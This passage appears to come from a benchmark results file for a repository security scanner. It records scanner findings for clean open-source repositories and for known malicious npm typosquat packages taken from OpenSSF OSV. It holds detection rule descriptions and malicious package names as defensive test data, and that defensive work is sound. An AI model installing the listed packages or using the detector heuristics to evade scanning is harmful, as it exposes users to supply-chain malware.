"corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/npm/cli", + "immutableRef": "7b1f6c173d17b3bf30e45426f6df39473c6a1163", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.09, + "safeToClone": true, + "rulesTriggered": [ + "HARDCODED_SECRETS" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "medium", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "lib/commands/profile.js", + "line": null, + "description": "Hardcoded credentials detected: Password" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "lib/utils/auth.js", + "line": null, + "description": "Hardcoded credentials detected: Password" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "lib/utils/read-user-info.js", + "line": null, + "description": "Hardcoded credentials detected: Password" + } + ], + "filesScanned": 200, + "filesSkipped": 6701, + "treeTruncated": false, + "durationMs": 3841, + "error": "" + }, + { + "sampleId": "noisy-homebrew-brew", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/Homebrew/brew", + "immutableRef": "76ca8d74e4a180badad438bf245ddfc740d68a8e", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.09, + "safeToClone": true, + "rulesTriggered": [ + "SUSPICIOUS_FILE_ACCESS" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": "Library/Homebrew/brew.sh", + "line": 860, + "description": "Suspicious file access detected: Destructive File Deletion" + } + ], + "filesScanned": 200, + "filesSkipped": 2970, + "treeTruncated": false, + "durationMs": 3802, + "error": "" + }, + { + "sampleId": "noisy-python-cpython", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/python/cpython", + "immutableRef": "1fece4457032382947c7c2a5c9e95dc106ca7a7d", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.165, + "safeToClone": true, + "rulesTriggered": [ + "OBF_BASE64_HEAVY", + "OBF_NEW_FUNCTION", + "OBFUSCATED_CODE", + "OBF_HEX_STRINGS", + "DATA_EXFILTRATION", + "NETWORK_COMMUNICATION", + "CODE_INTEGRITY_ISSUE" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "Doc/_static/tachyon-example-flamegraph.html", + "line": 9, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "Doc/_static/tachyon-example-flamegraph.html", + "line": 9, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "Doc/_static/tachyon-example-flamegraph.html", + "line": 9, + "description": "Extremely long line detected (279,572 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 9 (279,572 chars, contains suspicious code), Line 61 (58,594 chars, contains suspicious code), Line 64 (37,721 chars, contains suspicious code)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "Doc/_static/tachyon-example-heatmap.html", + "line": 1993, + "description": "Extremely long line detected (199,608 characters). Malicious code may be hidden far to the right. Affected: Line 1993 (199,608 chars)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_HEX_STRINGS", + "file": "Lib/_colorize.py", + "line": 16, + "description": "20+ hex escape sequences (\\xNN) in a single file. Hex encoding hides the actual string content from developers, often used to conceal URLs, commands, or shellcode.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_HEX_STRINGS", + "file": "Lib/_pyrepl/terminfo.py", + "line": 125, + "description": "20+ hex escape sequences (\\xNN) in a single file. Hex encoding hides the actual string content from developers, often used to conceal URLs, commands, or shellcode.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_HEX_STRINGS", + "file": "Lib/_pyrepl/windows_console.py", + "line": 116, + "description": "20+ hex escape sequences (\\xNN) in a single file. Hex encoding hides the actual string content from developers, often used to conceal URLs, commands, or shellcode.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_HEX_STRINGS", + "file": "Lib/_pyrepl/windows_eventqueue.py", + "line": 10, + "description": "20+ hex escape sequences (\\xNN) in a single file. Hex encoding hides the actual string content from developers, often used to conceal URLs, commands, or shellcode.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "Doc/_static/tachyon-example-flamegraph.html", + "line": 2518, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "medium", + "confidence": "low", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "Lib/_aix_support.py", + "line": 45, + "description": "Suspicious network communication detected: Hardcoded IP Address (1 occurrence)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "Lib/_pyrepl/windows_console.py", + "line": 173, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "medium", + "confidence": "low", + "type": "CODE_INTEGRITY_ISSUE", + "rule": "CODE_INTEGRITY_ISSUE", + "file": "Doc/_static/tachyon-example-flamegraph.html", + "line": null, + "description": "Minified/obfuscated code detected in source repository" + } + ], + "filesScanned": 200, + "filesSkipped": 5803, + "treeTruncated": false, + "durationMs": 6846, + "error": "" + }, + { + "sampleId": "noisy-django-django", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/django/django", + "immutableRef": "bdbda29c3e126754c3ae04ceb5c5d35d49aae01c", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 6874, + "treeTruncated": false, + "durationMs": 3404, + "error": "" + }, + { + "sampleId": "noisy-ansible-ansible", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/ansible/ansible", + "immutableRef": "8d63341579aa1c62024f3bce1a8af3f9a1b22a16", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.1275, + "safeToClone": true, + "rulesTriggered": [ + "NETWORK_COMMUNICATION", + "HARDCODED_SECRETS" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "low", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "lib/ansible/_internal/_powershell/_clixml.py", + "line": 182, + "description": "Suspicious network communication detected: Hardcoded IP Address (1 occurrence)" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "lib/ansible/cli/__init__.py", + "line": null, + "description": "Hardcoded credentials detected: Password" + } + ], + "filesScanned": 200, + "filesSkipped": 5591, + "treeTruncated": false, + "durationMs": 3448, + "error": "" + }, + { + "sampleId": "noisy-scrapy-scrapy", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/scrapy/scrapy", + "immutableRef": "c9446931a80e63ea1d77e130ea5581b547e0f51b", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 432, + "treeTruncated": false, + "durationMs": 2634, + "error": "" + }, + { + "sampleId": "noisy-pallets-flask", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/pallets/flask", + "immutableRef": "36e4a824f340fdee7ed50937ba8e7f6bc7d17f81", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 107, + "filesSkipped": 129, + "treeTruncated": false, + "durationMs": 2134, + "error": "" + }, + { + "sampleId": "noisy-rust-lang-rust", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/rust-lang/rust", + "immutableRef": "5503df87342a73d0c29126a7e08dc9c1255c46ad", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.2025, + "safeToClone": true, + "rulesTriggered": [ + "OBF_BASE64_HEAVY", + "SUSPICIOUS_FILE_ACCESS", + "NETWORK_COMMUNICATION", + "DATA_EXFILTRATION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/ci/docker/host-x86_64/dist-x86_64-netbsd/build-netbsd-toolchain.sh", + "line": 45, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": "compiler/rustc_codegen_cranelift/.github/scripts/free-disk-space.sh", + "line": 238, + "description": "Suspicious file access detected: Destructive File Deletion" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": "src/ci/docker/scripts/illumos-toolchain.sh", + "line": 85, + "description": "Suspicious file access detected: Destructive File Deletion" + }, + { + "severity": "medium", + "confidence": "low", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "src/ci/docker/scripts/ohos-sdk.sh", + "line": 6, + "description": "Suspicious network communication detected: Hardcoded IP Address (3 occurrences)" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": "src/ci/docker/scripts/solaris-toolchain.sh", + "line": 112, + "description": "Suspicious file access detected: Destructive File Deletion" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": "src/ci/scripts/free-disk-space-linux.sh", + "line": 313, + "description": "Suspicious file access detected: Destructive File Deletion" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": "src/ci/scripts/install-clang.sh", + "line": 53, + "description": "Suspicious file access detected: Destructive File Deletion" + }, + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "src/librustdoc/html/static/js/main.js", + "line": 459, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "src/librustdoc/html/static/js/search.js", + "line": 5406, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "src/tools/clippy/util/gh-pages/script.js", + "line": 341, + "description": "Data exfiltration patterns detected: Form Data Access" + } + ], + "filesScanned": 200, + "filesSkipped": 60050, + "treeTruncated": true, + "durationMs": 4744, + "error": "" + }, + { + "sampleId": "noisy-golang-go", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/golang/go", + "immutableRef": "03845e30f7b73d1703bd8c21017297f6eecb76d6", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 15414, + "treeTruncated": false, + "durationMs": 3653, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2024-8862", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2024-8862; report blob cebceb18d12edabb3bf055a6936a367b0614e792", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/bcrypts-js/MAL-2024-8862.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:cebceb18d12edabb3bf055a6936a367b0614e792:7c7ee68d6f6b26b48726c11558dc9206bf998cf9", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: bcrypts-js" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2024-1377", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2024-1377; report blob c78863fed3a5a3b662b72b05c16b77d9dc153665", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/cors-parser/MAL-2024-1377.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:c78863fed3a5a3b662b72b05c16b77d9dc153665:3e4eb5c422572ea85c1fff43d7e1f202899068b3", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: cors-parser" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-19413", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-19413; report blob 84b9fce13d64dd7ec790910850e9fbbbf58cf348", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/electorn/MAL-2025-19413.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:84b9fce13d64dd7ec790910850e9fbbbf58cf348:d511c4332bf47892ca7bf08a3ad5e06ccc7224fb", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: electorn" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-20690", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-20690; report blob 2fdd79a99598980c7c4cbaad70833538b602a95c", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/flatmap-stream/MAL-2025-20690.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:2fdd79a99598980c7c4cbaad70833538b602a95c:faa25eec2f63ebf17e74b3d3dad492afa2bdc214", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: flatmap-stream" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-25502", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-25502; report blob 67e0222164b6b5f6ec72ce58d7a20b430cac4dd2", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/lodahs/MAL-2025-25502.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:67e0222164b6b5f6ec72ce58d7a20b430cac4dd2:5ee45d530dcca44dea28a23994dbcdbecfc63f8e", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY", + "TYPOSQUAT_PACKAGE" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: lodahs" + }, + { + "severity": "medium", + "confidence": "unspecified", + "type": "TYPOSQUAT_PACKAGE", + "rule": "TYPOSQUAT_PACKAGE", + "file": "package.json", + "line": null, + "description": "Possible typosquat of \"lodash\": lodahs" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-4275", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-4275; report blob 238dc228cd9cf54efea67c07f9bc7089b15207b4", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios.js/MAL-2025-4275.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:238dc228cd9cf54efea67c07f9bc7089b15207b4:e015c3138480f5286955833abfb3bea47471688d", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: axios.js" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2026-4493", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2026-4493; report blob 366383ef9f8518dfc534b911251a2dbe5ccd3928", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axiosqqq/MAL-2026-4493.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:366383ef9f8518dfc534b911251a2dbe5ccd3928:bb3d39dbc3518a28407d264f2abcf070c3a3657b", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: axiosqqq" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-15242", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15242; report blob 5850d1f4f2806fd59eb535b3e4d45beb058bc826", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axioss/MAL-2025-15242.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:5850d1f4f2806fd59eb535b3e4d45beb058bc826:81363d511fb327ca5616ccfcba7c5393e1a0044c", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY", + "TYPOSQUAT_PACKAGE" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: axioss" + }, + { + "severity": "medium", + "confidence": "unspecified", + "type": "TYPOSQUAT_PACKAGE", + "rule": "TYPOSQUAT_PACKAGE", + "file": "package.json", + "line": null, + "description": "Possible typosquat of \"axios\": axioss" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-15281", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15281; report blob e6a3d9c6a3d214bff2f326a8f1d8ba8ac8c1d472", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-laoder/MAL-2025-15281.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:e6a3d9c6a3d214bff2f326a8f1d8ba8ac8c1d472:7ae13db475be04ecc7d2b6fcef3b20c40bbc2e03", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: babel-laoder" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-15282", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15282; report blob b23f507de17d8c239290fb1c36a5d9a6d886b92c", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loadre/MAL-2025-15282.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:b23f507de17d8c239290fb1c36a5d9a6d886b92c:cb4b464cf4c2449f6ad3903bd3e62fbe9c7579dd", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: babel-loadre" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-15283", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15283; report blob a98eafc3406e034fe14c4e2fe25edc21ee7e9a47", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loqder/MAL-2025-15283.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:a98eafc3406e034fe14c4e2fe25edc21ee7e9a47:b2eee8c6fb943b5b47deffd77c116865d4d2ddee", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: babel-loqder" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-15286", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15286; report blob 7d72739e67fda4b48cc77bfcb6c868feafd17567", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-node/MAL-2025-15286.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:7d72739e67fda4b48cc77bfcb6c868feafd17567:9b2980f27303a4070b0e103b0621839940ee9724", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + 